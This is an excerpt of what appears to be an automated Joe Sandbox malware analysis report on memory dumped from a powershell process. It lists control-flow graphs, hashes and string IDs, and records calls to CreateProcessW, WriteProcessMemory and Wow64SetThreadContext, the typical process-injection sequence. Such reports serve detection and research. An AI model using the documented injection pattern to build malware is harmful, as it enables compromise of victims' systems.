147->148 149 76e149b 147->149 148->146 149->146
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$B$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2769017150
                                                                              • Opcode ID: b1953c07e582ddb8759965fa1674296e211cff039f9e9b505ba6e7477d74ad43
                                                                              • Instruction ID: 37ac1746867378e1c48bc66f0a45b2389180cc5f557685f1273d44f7066745c0
                                                                              • Opcode Fuzzy Hash: b1953c07e582ddb8759965fa1674296e211cff039f9e9b505ba6e7477d74ad43
                                                                              • Instruction Fuzzy Hash: 93F12BB1B0130E8FCB2C5E7998046BABBEAAF86610F14847AD447CB355DE31C946D7B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1590887
                                                                              • Opcode ID: 342bb64a5863e4fa9086d015bb2ee7c5927ab57317838e53a52ab060ac4257b1
                                                                              • Instruction ID: c5389d658a29eef83cbf26827f7ccc4788496d7417d39dbaa90a2ae6c3c40693
                                                                              • Opcode Fuzzy Hash: 342bb64a5863e4fa9086d015bb2ee7c5927ab57317838e53a52ab060ac4257b1
                                                                              • Instruction Fuzzy Hash: FA122CB1B057099FCB248F39D8647AABBAFBB85310F14C46AD5468B351DB31C886CB71

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 332 76e1d48-76e1d6e 333 76e1f1a-76e1f3c 332->333 334 76e1d74-76e1d79 332->334 348 76e1f3e-76e1f62 333->348 349 76e1f95-76e1f98 333->349 335 76e1d7b-76e1d81 334->335 336 76e1d91-76e1d95 334->336 337 76e1d85-76e1d8f 335->337 338 76e1d83 335->338 340 76e1d9b-76e1d9d 336->340 341 76e1ec6-76e1ed0 336->341 337->336 338->336 343 76e1d9f-76e1dab 340->343 344 76e1dad 340->344 345 76e1ede-76e1ee4 341->345 346 76e1ed2-76e1edb 341->346 350 76e1daf-76e1db1 343->350 344->350 351 76e1eea-76e1ef6 345->351 352 76e1ee6-76e1ee8 345->352 355 76e1f68-76e1f6d 348->355 356 76e2094-76e20c5 348->356 353 76e1fa9-76e1fad 349->353 354 76e1f99-76e1f9f 349->354 350->341 357 76e1db7-76e1dbb 350->357 358 76e1ef8-76e1f17 351->358 352->358 360 76e1faf-76e1fb5 353->360 361 76e1fc7-76e1fd2 353->361 359 76e1fa3-76e1fa5 354->359 362 76e1f6f-76e1f75 355->362 363 76e1f85-76e1f89 355->363 378 76e20c7-76e20d3 356->378 379 76e20d5 356->379 364 76e1dce 357->364 365 76e1dbd-76e1dcc 357->365 359->353 368 76e2046-76e2050 359->368 371 76e1fb9-76e1fc5 360->371 372 76e1fb7 360->372 392 76e1fea-76e2043 361->392 393 76e1fd4-76e1fda 361->393 373 76e1f79-76e1f83 362->373 374 76e1f77 362->374 367 76e1f8f-76e1f91 363->367 363->368 375 76e1dd0-76e1dd2 364->375 365->375 376 76e1f93 367->376 377 76e1fa1 367->377 380 76e205d-76e2063 368->380 381 76e2052-76e205a 368->381 371->361 372->361 373->363 374->363 375->341 383 76e1dd8-76e1dda 375->383 376->349 377->359 387 76e20d7-76e20d9 378->387 379->387 388 76e2069-76e2075 380->388 389 76e2065-76e2067 380->389 384 76e1ddc-76e1de8 383->384 385 76e1dea 383->385 396 76e1dec-76e1dee 384->396 385->396 398 76e20db-76e20fa 387->398 399 76e2147-76e2151 387->399 400 76e2077-76e2091 388->400 389->400 394 76e1fde-76e1fe0 393->394 395 76e1fdc 393->395 394->392 395->392 396->341 401 76e1df4-76e1df6 396->401 422 76e20fc-76e2108 398->422 423 76e210a 398->423 402 76e215a-76e2160 399->402 403 76e2153-76e2157 399->403 405 76e1df8-76e1dfe 401->405 406 76e1e10-76e1e1b 401->406 407 76e2166-76e2172 402->407 408 76e2162-76e2164 402->408 411 76e1e02-76e1e0e 405->411 412 76e1e00 405->412 414 76e1e1d-76e1e20 406->414 415 76e1e2a-76e1e36 406->415 413 76e2174-76e2192 407->413 408->413 411->406 412->406 414->415 419 76e1e38-76e1e3a 415->419 420 76e1e44-76e1e4b 415->420 419->420 425 76e1e52-76e1e54 420->425 426 76e210c-76e210e 422->426 423->426 427 76e1e6c-76e1ec3 425->427 428 76e1e56-76e1e5c 425->428 426->399 429 76e2110-76e212d 426->429 431 76e1e5e 428->431 432 76e1e60-76e1e62 428->432 435 76e212f-76e2141 429->435 436 76e2195-76e219a 429->436 431->427 432->427 435->399 436->435
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3512890053
                                                                              • Opcode ID: 339c1e111a168e440dc800d862c54de68e64a586a764a4d5420199ee1dca1372
                                                                              • Instruction ID: 90070e7477c49f7d42ab0a3c19ee2e591097c65b985073d09c1b481fc0edb990
                                                                              • Opcode Fuzzy Hash: 339c1e111a168e440dc800d862c54de68e64a586a764a4d5420199ee1dca1372
                                                                              • Instruction Fuzzy Hash: 35B13CB1B0534ADFCB294A3988106BABBEEAF87210F14846BD506CF351DB31C946D7B1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 438 76e01e8-76e0211 439 76e0459-76e048f 438->439 440 76e0217-76e021c 438->440 448 76e049f 439->448 449 76e0491-76e049d 439->449 441 76e021e-76e0224 440->441 442 76e0234-76e0238 440->442 444 76e0228-76e0232 441->444 445 76e0226 441->445 446 76e023e-76e0240 442->446 447 76e0409-76e0413 442->447 444->442 445->442 452 76e0242-76e024e 446->452 453 76e0250 446->453 450 76e0415-76e041e 447->450 451 76e0421-76e0427 447->451 454 76e04a1-76e04a3 448->454 449->454 456 76e042d-76e0439 451->456 457 76e0429-76e042b 451->457 458 76e0252-76e0254 452->458 453->458 459 76e04a9-76e04c1 454->459 460 76e0592-76e059c 454->460 461 76e043b-76e0456 456->461 457->461 458->447 462 76e025a-76e0279 458->462 471 76e04c7-76e04cc 459->471 472 76e05e5-76e062c 459->472 464 76e059e-76e05a4 460->464 465 76e05a7-76e05ad 460->465 483 76e02bb 462->483 484 76e027b-76e028e 462->484 467 76e05af-76e05b1 465->467 468 76e05b3-76e05bf 465->468 473 76e05c1-76e05e2 467->473 468->473 474 76e04ce-76e04d4 471->474 475 76e04e4-76e04ee 471->475 486 76e062e-76e063a 472->486 487 76e063c 472->487 481 76e04d8-76e04e2 474->481 482 76e04d6 474->482 485 76e04f3-76e0504 475->485 481->475 482->475 488 76e02bd-76e02bf 483->488 484->439 495 76e0294-76e0299 484->495 485->472 499 76e050a-76e050f 485->499 491 76e063e-76e0640 486->491 487->491 488->447 492 76e02c5-76e02cf 488->492 496 76e06ff-76e0709 491->496 497 76e0646-76e0648 491->497 492->439 498 76e02d5-76e02da 492->498 500 76e029b-76e02a1 495->500 501 76e02b1-76e02b9 495->501 502 76e070b-76e0714 496->502 503 76e0717-76e071d 496->503 504 76e064a-76e0650 497->504 505 76e0662-76e066b 497->505 506 76e02dc-76e02e2 498->506 507 76e02f2-76e0300 498->507 510 76e0527-76e054a 499->510 511 76e0511-76e0517 499->511 512 76e02a5-76e02af 500->512 513 76e02a3 500->513 501->488 514 76e071f-76e0721 503->514 515 76e0723-76e072f 503->515 516 76e0654-76e0660 504->516 517 76e0652 504->517 508 76e066f-76e067e 505->508 509 76e066d 505->509 518 76e02e6-76e02f0 506->518 519 76e02e4 506->519 507->447 528 76e0306-76e0323 507->528 532 76e068d-76e06d3 508->532 533 76e0680-76e068b 508->533 509->508 510->472 540 76e0550-76e0555 510->540 521 76e051b-76e0525 511->521 522 76e0519 511->522 512->501 513->501 523 76e0731-76e074d 514->523 515->523 516->505 517->505 518->507 519->507 521->510 522->510 528->447 547 76e0329-76e034e 528->547 558 76e06df-76e06e9 532->558 559 76e06d5 532->559 535 76e06f3-76e06fc 533->535 542 76e056d-76e058f 540->542 543 76e0557-76e055d 540->543 544 76e055f 543->544 545 76e0561-76e056b 543->545 544->542 545->542 547->447 555 76e0354-76e038b 547->555 564 76e038d-76e0393 555->564 565 76e03a5-76e03ac 555->565 560 76e06da 558->560 561 76e06eb 558->561 559->560 560->558 561->535 566 76e0397-76e03a3 564->566 567 76e0395 564->567 568 76e03ae-76e03b4 565->568 569 76e03c4-76e0406 565->569 566->565 567->565 570 76e03b8-76e03c2 568->570 571 76e03b6 568->571 570->569 571->569
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3669853574
                                                                              • Opcode ID: 83fcb07fa8047420ecbd9cd957a56733f46741b619a9c4869872009639ac3e7e
                                                                              • Instruction ID: fc4585a7bd706b24cf59059009a4dc9d610627374ca700ffd9bd828af29c50fd
                                                                              • Opcode Fuzzy Hash: 83fcb07fa8047420ecbd9cd957a56733f46741b619a9c4869872009639ac3e7e
                                                                              • Instruction Fuzzy Hash: CAE107B5B01216CFDB24CA68D90066ABBEAAFC5310B34C46AD406DF355DF72DC46CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db7b2d08ae16ec6436cb8ce42742258ff2da98cf6d8ffc12cd5e071b2cd71ddb
                                                                              • Instruction ID: 0e7d3c20123f7835193b23afb5df358878ccb2e0e7e157827ec04b1a7e7816dc
                                                                              • Opcode Fuzzy Hash: db7b2d08ae16ec6436cb8ce42742258ff2da98cf6d8ffc12cd5e071b2cd71ddb
                                                                              • Instruction Fuzzy Hash: 44028F30A083188FEB24CF65CC54B9AB7F6EF88304F1481E9D549AB291DB70AD95CF61

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 977 76e1338-76e137b 979 76e1556-76e159b 977->979 980 76e1381-76e1386 977->980 990 76e16f2-76e173e 979->990 991 76e15a1-76e15a6 979->991 981 76e139e-76e13a2 980->981 982 76e1388-76e138e 980->982 983 76e13a8-76e13ac 981->983 984 76e1503-76e150d 981->984 986 76e1392-76e139c 982->986 987 76e1390 982->987 988 76e13ae-76e13bd 983->988 989 76e13bf 983->989 992 76e150f-76e1518 984->992 993 76e151b-76e1521 984->993 986->981 987->981 994 76e13c1-76e13c3 988->994 989->994 1010 76e18ab-76e18e0 990->1010 1011 76e1744-76e1749 990->1011 995 76e15be-76e15c2 991->995 996 76e15a8-76e15ae 991->996 998 76e1527-76e1533 993->998 999 76e1523-76e1525 993->999 994->984 1003 76e13c9-76e13e9 994->1003 1001 76e169f-76e16a9 995->1001 1002 76e15c8-76e15ca 995->1002 1005 76e15b2-76e15bc 996->1005 1006 76e15b0 996->1006 1000 76e1535-76e1553 998->1000 999->1000 1012 76e16ab-76e16b4 1001->1012 1013 76e16b7-76e16bd 1001->1013 1008 76e15cc-76e15d8 1002->1008 1009 76e15da 1002->1009 1041 76e13eb-76e1406 1003->1041 1042 76e1408 1003->1042 1005->995 1006->995 1015 76e15dc-76e15de 1008->1015 1009->1015 1035 76e18e2-76e18ee 1010->1035 1036 76e18f0 1010->1036 1018 76e174b-76e1751 1011->1018 1019 76e1761-76e1765 1011->1019 1020 76e16bf-76e16c1 1013->1020 1021 76e16c3-76e16cf 1013->1021 1015->1001 1022 76e15e4-76e15e8 1015->1022 1024 76e1755-76e175f 1018->1024 1025 76e1753 1018->1025 1027 76e185a-76e1864 1019->1027 1028 76e176b-76e176d 1019->1028 1026 76e16d1-76e16ef 1020->1026 1021->1026 1031 76e15ea-76e1606 1022->1031 1032 76e1608 1022->1032 1024->1019 1025->1019 1037 76e1866-76e186f 1027->1037 1038 76e1872-76e1878 1027->1038 1029 76e176f-76e177b 1028->1029 1030 76e177d 1028->1030 1047 76e177f-76e1781 1029->1047 1030->1047 1045 76e160a-76e160c 1031->1045 1032->1045 1048 76e18f2-76e18f4 1035->1048 1036->1048 1043 76e187e-76e188a 1038->1043 1044 76e187a-76e187c 1038->1044 1055 76e140a-76e140c 1041->1055 1042->1055 1053 76e188c-76e18a8 1043->1053 1044->1053 1045->1001 1054 76e1612-76e1615 1045->1054 1047->1027 1049 76e1787-76e1789 1047->1049 1051 76e196e-76e1978 1048->1051 1052 76e18f6-76e18f8 1048->1052 1062 76e178b-76e1797 1049->1062 1063 76e1799 1049->1063 1058 76e197a-76e1980 1051->1058 1059 76e1983-76e1989 1051->1059 1064 76e18fa-76e1906 1052->1064 1065 76e1908 1052->1065 1069 76e161f-76e1625 1054->1069 1055->984 1061 76e1412-76e1414 1055->1061 1067 76e198f-76e199b 1059->1067 1068 76e198b-76e198d 1059->1068 1070 76e1416-76e1422 1061->1070 1071 76e1424 1061->1071 1073 76e179b-76e179d 1062->1073 1063->1073 1074 76e190a-76e190c 1064->1074 1065->1074 1076 76e199d-76e19b6 1067->1076 1068->1076 1083 76e162b-76e162d 1069->1083 1077 76e1426-76e1428 1070->1077 1071->1077 1073->1027 1078 76e17a3-76e17a5 1073->1078 1074->1051 1079 76e190e-76e1914 1074->1079 1077->984 1084 76e142e-76e144e 1077->1084 1086 76e17bf-76e17c3 1078->1086 1087 76e17a7-76e17ad 1078->1087 1080 76e1916-76e1918 1079->1080 1081 76e1922-76e192b 1079->1081 1080->1081 1088 76e192d-76e192f 1081->1088 1089 76e1939-76e1956 1081->1089 1091 76e162f-76e1635 1083->1091 1092 76e1645-76e169c 1083->1092 1112 76e1466-76e146a 1084->1112 1113 76e1450-76e1456 1084->1113 1095 76e17dd-76e1857 1086->1095 1096 76e17c5-76e17cb 1086->1096 1093 76e17af 1087->1093 1094 76e17b1-76e17bd 1087->1094 1088->1089 1108 76e1958-76e1968 1089->1108 1109 76e19b9-76e19be 1089->1109 1097 76e1639-76e163b 1091->1097 1098 76e1637 1091->1098 1093->1086 1094->1086 1101 76e17cf-76e17db 1096->1101 1102 76e17cd 1096->1102 1097->1092 1098->1092 1101->1095 1102->1095 1108->1051 1109->1108 1118 76e146c-76e1472 1112->1118 1119 76e1484-76e1488 1112->1119 1116 76e145a-76e145c 1113->1116 1117 76e1458 1113->1117 1116->1112 1117->1112 1120 76e1476-76e1482 1118->1120 1121 76e1474 1118->1121 1122 76e148f-76e1491 1119->1122 1120->1119 1121->1119 1124 76e14a9-76e1500 1122->1124 1125 76e1493-76e1499 1122->1125 1126 76e149d-76e149f 1125->1126 1127 76e149b 1125->1127 1126->1124 1127->1124
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$$^q$$^q
                                                                              • API String ID: 0-2291298209
                                                                              • Opcode ID: e8a3708b97a15a3329d160618af767999fd47c09b76806dee3fcefdc28ce9f54
                                                                              • Instruction ID: d6063e9fd7c56c0860463a560f527ac6b6ab2e047e19072ccf832d1e7af42629
                                                                              • Opcode Fuzzy Hash: e8a3708b97a15a3329d160618af767999fd47c09b76806dee3fcefdc28ce9f54
                                                                              • Instruction Fuzzy Hash: 443109F0A1630EDFDB294A35C4107B97BA9AF43214F548066D402CB392FB35CA4AD7B1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1129 76e1d28-76e1d6e 1131 76e1f1a-76e1f3c 1129->1131 1132 76e1d74-76e1d79 1129->1132 1146 76e1f3e-76e1f62 1131->1146 1147 76e1f95-76e1f98 1131->1147 1133 76e1d7b-76e1d81 1132->1133 1134 76e1d91-76e1d95 1132->1134 1135 76e1d85-76e1d8f 1133->1135 1136 76e1d83 1133->1136 1138 76e1d9b-76e1d9d 1134->1138 1139 76e1ec6-76e1ed0 1134->1139 1135->1134 1136->1134 1141 76e1d9f-76e1dab 1138->1141 1142 76e1dad 1138->1142 1143 76e1ede-76e1ee4 1139->1143 1144 76e1ed2-76e1edb 1139->1144 1148 76e1daf-76e1db1 1141->1148 1142->1148 1149 76e1eea-76e1ef6 1143->1149 1150 76e1ee6-76e1ee8 1143->1150 1153 76e1f68-76e1f6d 1146->1153 1154 76e2094-76e20c5 1146->1154 1151 76e1fa9-76e1fad 1147->1151 1152 76e1f99-76e1f9f 1147->1152 1148->1139 1155 76e1db7-76e1dbb 1148->1155 1156 76e1ef8-76e1f17 1149->1156 1150->1156 1158 76e1faf-76e1fb5 1151->1158 1159 76e1fc7-76e1fd2 1151->1159 1157 76e1fa3-76e1fa5 1152->1157 1160 76e1f6f-76e1f75 1153->1160 1161 76e1f85-76e1f89 1153->1161 1176 76e20c7-76e20d3 1154->1176 1177 76e20d5 1154->1177 1162 76e1dce 1155->1162 1163 76e1dbd-76e1dcc 1155->1163 1157->1151 1166 76e2046-76e2050 1157->1166 1169 76e1fb9-76e1fc5 1158->1169 1170 76e1fb7 1158->1170 1190 76e1fea-76e2043 1159->1190 1191 76e1fd4-76e1fda 1159->1191 1171 76e1f79-76e1f83 1160->1171 1172 76e1f77 1160->1172 1165 76e1f8f-76e1f91 1161->1165 1161->1166 1173 76e1dd0-76e1dd2 1162->1173 1163->1173 1174 76e1f93 1165->1174 1175 76e1fa1 1165->1175 1178 76e205d-76e2063 1166->1178 1179 76e2052-76e205a 1166->1179 1169->1159 1170->1159 1171->1161 1172->1161 1173->1139 1181 76e1dd8-76e1dda 1173->1181 1174->1147 1175->1157 1185 76e20d7-76e20d9 1176->1185 1177->1185 1186 76e2069-76e2075 1178->1186 1187 76e2065-76e2067 1178->1187 1182 76e1ddc-76e1de8 1181->1182 1183 76e1dea 1181->1183 1194 76e1dec-76e1dee 1182->1194 1183->1194 1196 76e20db-76e20fa 1185->1196 1197 76e2147-76e2151 1185->1197 1198 76e2077-76e2091 1186->1198 1187->1198 1192 76e1fde-76e1fe0 1191->1192 1193 76e1fdc 1191->1193 1192->1190 1193->1190 1194->1139 1199 76e1df4-76e1df6 1194->1199 1220 76e20fc-76e2108 1196->1220 1221 76e210a 1196->1221 1200 76e215a-76e2160 1197->1200 1201 76e2153-76e2157 1197->1201 1203 76e1df8-76e1dfe 1199->1203 1204 76e1e10-76e1e1b 1199->1204 1205 76e2166-76e2172 1200->1205 1206 76e2162-76e2164 1200->1206 1209 76e1e02-76e1e0e 1203->1209 1210 76e1e00 1203->1210 1212 76e1e1d-76e1e20 1204->1212 1213 76e1e2a-76e1e36 1204->1213 1211 76e2174-76e2192 1205->1211 1206->1211 1209->1204 1210->1204 1212->1213 1217 76e1e38-76e1e3a 1213->1217 1218 76e1e44-76e1e4b 1213->1218 1217->1218 1223 76e1e52-76e1e54 1218->1223 1224 76e210c-76e210e 1220->1224 1221->1224 1225 76e1e6c-76e1ec3 1223->1225 1226 76e1e56-76e1e5c 1223->1226 1224->1197 1227 76e2110-76e212d 1224->1227 1229 76e1e5e 1226->1229 1230 76e1e60-76e1e62 1226->1230 1233 76e212f-76e2141 1227->1233 1234 76e2195-76e219a 1227->1234 1229->1225 1230->1225 1233->1197 1234->1233
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$$^q$$^q
                                                                              • API String ID: 0-2291298209
                                                                              • Opcode ID: 8fadc498671e5487426b50a324016deeb5a3b4961e705139234d2a91ca215ba4
                                                                              • Instruction ID: b92377b20cfbc2841958b4a25b685df77ac3a61a7ffa3fac52d388ec2c3f80ee
                                                                              • Opcode Fuzzy Hash: 8fadc498671e5487426b50a324016deeb5a3b4961e705139234d2a91ca215ba4
                                                                              • Instruction Fuzzy Hash: E531C1B5E0630EDFCB2C8E35C84066A7BE9EF43250F598566E8168B241C735C845EBB1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1236 76e0b80-76e0b92 1237 76e0b98-76e0ba9 1236->1237 1238 76e0c52-76e0ccc 1236->1238 1242 76e0bab-76e0bb1 1237->1242 1243 76e0bc3-76e0be0 1237->1243 1262 76e0cce-76e0cdc 1238->1262 1263 76e0cf9-76e0cfe 1238->1263 1244 76e0bb5-76e0bc1 1242->1244 1245 76e0bb3 1242->1245 1243->1238 1248 76e0be2-76e0c04 1243->1248 1244->1243 1245->1243 1252 76e0c1e-76e0c36 1248->1252 1253 76e0c06-76e0c0c 1248->1253 1259 76e0c38-76e0c3a 1252->1259 1260 76e0c44-76e0c4f 1252->1260 1255 76e0c0e 1253->1255 1256 76e0c10-76e0c1c 1253->1256 1255->1252 1256->1252 1259->1260 1266 76e0ce4-76e0cf3 1262->1266 1263->1262 1266->1263
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: be87e05f3ecceea891e275597a902d65bc9ace858965b8c697fd0129ee8a6d73
                                                                              • Instruction ID: c3928eb3a6680d55f0715b21e2d0402902913908ef32301ab6c0c9f4ae0bc14b
                                                                              • Opcode Fuzzy Hash: be87e05f3ecceea891e275597a902d65bc9ace858965b8c697fd0129ee8a6d73
                                                                              • Instruction Fuzzy Hash: 38415B70B013186FCB249B748C05B6A7FEABF89B14F648456E445DF381CAB19C85C7B2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1267 4ba8f44-4baac69 1270 4baac6b-4baac6e 1267->1270 1271 4baac71-4baac78 1267->1271 1270->1271 1272 4baac7a-4baac80 1271->1272 1273 4baac83-4baac99 1271->1273 1272->1273 1274 4baac9b-4baaca1 1273->1274 1275 4baaca4-4baad47 CreateProcessW 1273->1275 1274->1275 1277 4baad49-4baad4f 1275->1277 1278 4baad50-4baadc8 1275->1278 1277->1278 1285 4baadda-4baade1 1278->1285 1286 4baadca-4baadd0 1278->1286 1287 4baadf8 1285->1287 1288 4baade3-4baadf2 1285->1288 1286->1285 1289 4baadf9 1287->1289 1288->1287 1289->1289
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04BAAD34
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 479cfd9a0b1faa75906f21b4e7df8b903e85dad0d11a77fb4be21304dc583066
                                                                              • Instruction ID: d80cec57a6a067e2077a141b955fe7ecee33134285e0e10d993f88006bea986c
                                                                              • Opcode Fuzzy Hash: 479cfd9a0b1faa75906f21b4e7df8b903e85dad0d11a77fb4be21304dc583066
                                                                              • Instruction Fuzzy Hash: 9C51187190121ADFDB24CF99C940BDEBBB5BF48304F1484EAE909B7250D775AA84CFA0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1291 4ba8f68-4baafee 1294 4baaff8-4bab031 WriteProcessMemory 1291->1294 1295 4baaff0-4baaff6 1291->1295 1296 4bab03a-4bab05b 1294->1296 1297 4bab033-4bab039 1294->1297 1295->1294 1297->1296
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18822514,00000000,?,?,?,00000000,00000000,?,04BAA7AF,?,00000000,?), ref: 04BAB024
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 590eabac1a2000646b2806e3ccb537c6fe93a69890874ff123334702771d1338
                                                                              • Instruction ID: 79c951f8f691f303ca8dc3e1611785518d663097ef773dd9cfe1818cd3f23c63
                                                                              • Opcode Fuzzy Hash: 590eabac1a2000646b2806e3ccb537c6fe93a69890874ff123334702771d1338
                                                                              • Instruction Fuzzy Hash: 2B2107B1904349DFDB10CF99D884BDEBBF4FB48320F108469E518A7240D378A954CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1299 4baafa0-4baafee 1301 4baaff8-4bab031 WriteProcessMemory 1299->1301 1302 4baaff0-4baaff6 1299->1302 1303 4bab03a-4bab05b 1301->1303 1304 4bab033-4bab039 1301->1304 1302->1301 1304->1303
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18822514,00000000,?,?,?,00000000,00000000,?,04BAA7AF,?,00000000,?), ref: 04BAB024
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: cc9893b9579370297d7f93456ee8d672eb7822d7ee947f57cfc3e7451c2a7e75
                                                                              • Instruction ID: c533f8ae870838fb540fd98aee517e51634e0d4765f88ce7991c56084720710b
                                                                              • Opcode Fuzzy Hash: cc9893b9579370297d7f93456ee8d672eb7822d7ee947f57cfc3e7451c2a7e75
                                                                              • Instruction Fuzzy Hash: 7C2115B6904349DFDB10CFA9D884BEEBBF4FB08324F10842AE518A7200D378A644CF65

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1314 4ba8f74-4baae70 1317 4baae7c-4baaea8 Wow64SetThreadContext 1314->1317 1318 4baae72-4baae7a 1314->1318 1319 4baaeaa-4baaeb0 1317->1319 1320 4baaeb1-4baaed2 1317->1320 1318->1317 1319->1320
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04BAA563), ref: 04BAAE9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: c2bb9a489cd9c8a7249ab17f56cabf7ff7d7f0613c5a416f5c5eca81dce9a9c6
                                                                              • Instruction ID: e0cc83bb8a59da490f4ee1ed749ba5be839e331216e5fa64f2bd60618b8a7b36
                                                                              • Opcode Fuzzy Hash: c2bb9a489cd9c8a7249ab17f56cabf7ff7d7f0613c5a416f5c5eca81dce9a9c6
                                                                              • Instruction Fuzzy Hash: 2F1126B2D043098FDB10DF9AC844BDEFBF4EB88320F248469D458A3240D378A545CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1306 4ba8f50-4baae70 1309 4baae7c-4baaea8 Wow64SetThreadContext 1306->1309 1310 4baae72-4baae7a 1306->1310 1311 4baaeaa-4baaeb0 1309->1311 1312 4baaeb1-4baaed2 1309->1312 1310->1309 1311->1312
                                                                              APIs
